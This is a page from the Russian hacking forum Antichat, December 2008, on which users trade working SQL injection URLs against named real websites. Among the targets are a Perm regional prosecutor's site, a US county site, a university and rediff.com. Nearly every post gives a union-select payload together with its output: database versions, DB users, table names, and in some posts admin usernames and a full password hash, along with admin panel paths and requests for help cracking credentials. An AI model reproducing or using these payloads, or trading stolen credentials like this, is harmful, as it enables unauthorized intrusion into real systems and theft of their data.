ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7261  
Старый 30.12.2008, 19:38
Аватар для Gemini12
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038

Репутация: 9
Отправить сообщение для Gemini12 с помощью ICQ
Cool

наткнулся на:
Код:
http://line.kz/reviews/?cat=13&id=www.site.com/view.asp?id=-1+union+select+1,2,3,4,5,6,7,8--
выдает
Microsoft OLE DB Provider for SQL Server ошибка '80040e10'

дошел до
Код:
http://line.kz/reviews/?cat=13&id=www.site.com/view.asp?id=-1+union+select+1,2,3,4,5,6,7,8*+from+msysobjects+in+'.'
выдал : Îòñóòñòâóåò çíà÷åíèå äëÿ îäíîãî èëè íåñêîëüêèõ òðåáóåìûõ ïàðàìåòðîâ.

может еще кто глубже капнет? а то интересно, че там в конце тунеля! )))
 
Ответить с цитированием

  #7262  
Старый 30.12.2008, 20:40
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Gemini12, тут нет скули!
 
Ответить с цитированием

  #7263  
Старый 30.12.2008, 21:03
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от mailbrush  
Gemini12, тут нет скули!
Серьёзно? А что там есть?

https://forum.antichat.ru/showpost.php?p=1024180&postcount=4430
 
Ответить с цитированием

  #7264  
Старый 30.12.2008, 22:23
Аватар для prescott
prescott
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470

Репутация: 115
По умолчанию

Пр0kуратуpa Пермск0го Края

http://www.prokuror.perm.ru/posts?id=-1+union+select+1,2,3,version(),5,DATABASE(),7,8,9--+

information_schema закрыта, или ее тупо нет, ибо версия 4, таблу с админами так и не нашел, админка в /admin/

Последний раз редактировалось prescott; 30.12.2008 в 22:34..
 
Ответить с цитированием

  #7265  
Старый 30.12.2008, 22:57
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Legis.krsn.ru - PR5 ~1.3к
Цитата:
http://www.legis.krsn.ru/lawsinfo.php?UID=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
4 ветка..

Arabwestreport.info - PR5 ~1.3к
Цитата:
http://www.arabwestreport.info/AWR/article_details.php?article_id=-20182+union+select+1,2,concat_ws(0x3a,admin_userna me,admin_pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19+from+admins--
/webmanager

Co.dona-ana.nm.us - PR5 ~1.3к
Цитата:
http://www.co.dona-ana.nm.us/news/story.php?news_ID=-44+or+1=1/*
Rockportartcenter.com - PR4 ~0.7к
Цитата:
http://www.rockportartcenter.com/exhibitions/detail.php?uid=45'+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,email+from+ user+limit+1,1/*

Последний раз редактировалось sabe; 30.12.2008 в 23:07..
 
Ответить с цитированием

  #7266  
Старый 31.12.2008, 00:48
Аватар для vladvk
vladvk
Новичок
Регистрация: 22.12.2008
Сообщений: 16
Провел на форуме:
59223

Репутация: 7
По умолчанию

http://carepa.org/detail.php?uid=-53+union+select+1,2,3,4,5--
Не могу раскрутить, через order by показывает что там от 1 до 5 колонок но постоянно ошибка вылазит
 
Ответить с цитированием

  #7267  
Старый 31.12.2008, 01:09
Аватар для prescott
prescott
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470

Репутация: 115
По умолчанию

Цитата:
Сообщение от vladvk  
http://carepa.org/detail.php?uid=-53+union+select+1,2,3,4,5--
Не могу раскрутить, через order by показывает что там от 1 до 5 колонок но постоянно ошибка вылазит
Это значит скорее всего что параметр используется больше, чем в одном запросе, первый запрос прокатывает с 5 полями, второй выдает ошибку. В таких случаях или перебор, или ищи другой инъект. (Инъект не приходит в одиночку =)

например вот нормальная инъекция с этого сайта

Код:
http://carepa.org/mixers.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1--+
UPD: данные админа
Код:
http://carepa.org/mixers.php?id=-1+union+select+1,username,3,4,5,6,7,8,9,0,password+from+rc_admin--+
http://carepa.org/admin/
admin
$1$.y3.ta3.$Jk5.iyx3OT9IZlhJ8CKQy/

КТо скажет что за хэш?

Последний раз редактировалось prescott; 31.12.2008 в 01:16..
 
Ответить с цитированием

  #7268  
Старый 31.12.2008, 02:07
Аватар для lexus5122
lexus5122
Новичок
Регистрация: 16.03.2007
Сообщений: 24
Провел на форуме:
145084

Репутация: 2
По умолчанию

Цитата:
http://dixis.ru/actions.php?act_id=-347+union+select+1,2,group_concat(column_name),4,5 %20%20,6,7,8,9,10,11,12,13+from+information_schema .columns+where+table_name=0x494d45495f7573657273--
Помогите пожалуйста достать админ пасс и лог в ПМ => дам адресс админки
 
Ответить с цитированием

  #7269  
Старый 31.12.2008, 03:45
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

http://ishare.rediff.com/music_category.php?id=-40+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at_ws(0x3a3a,version(),user(),database())--

5.1.30-log
imusicusr@10.50.31.24
imusic



http://www.fitnesstogether.com/news_view.php?id=-40+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,versi on(),user(),database())--

5.0.27-community-nt
admin_suite_user@localhost
admin_suite

http://www.carli.illinois.edu/reports/prodvett/indiv_prop.php?id=-40+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,versi on(),user(),database()),8,9,10,11,12,13,14,15,16/*


5.0.38-Ubuntu_0ubuntu1.4-log
signupsuper@localhost
suggest

http://www.herpconstrust.org.uk/gallery/pic.php?id=21+union+select+1,2,concat_ws(0x3a3a,ve rsion(),user(),database()),4,5,6,7/*

4.1.19-standard-log
herpconstrust@localhost
herpconstrust

http://www.awards-world.com/art.php?id_article=-22+union+select+1,2,3,user(),5,6,7,8,9--&id_page=21

awardswo_admin@localhost
4.1.22-standard-log
awardswo_AWARDSWORLD

Всех с наступающим!
 
Ответить с цитированием

  #7270  
Старый 31.12.2008, 04:15
Аватар для vladvk
vladvk
Новичок
Регистрация: 22.12.2008
Сообщений: 16
Провел на форуме:
59223

Репутация: 7
По умолчанию

Цитата:
http://www.carli.illinois.edu/reports/prodvett/indiv_prop.php?id=-40+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,versi on(),user(),database()),8,9,10,11,12,13,14,15,16/*
Вытащил таблицу с колонками а он пишет:
Цитата:
Table 'suggest.cms_users' doesn't exist
Цитата:
http://www.carli.illinois.edu/reports/prodvett/indiv_prop.php?id=-40+union+select+1,2,3,4,5,6,concat(username,char(5 8),password),8,9,10,11,12,13,14,15,16+from+cms_use rs+limit+0,1/*
cms_users:email
cms_usersassword
cms_users:username
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ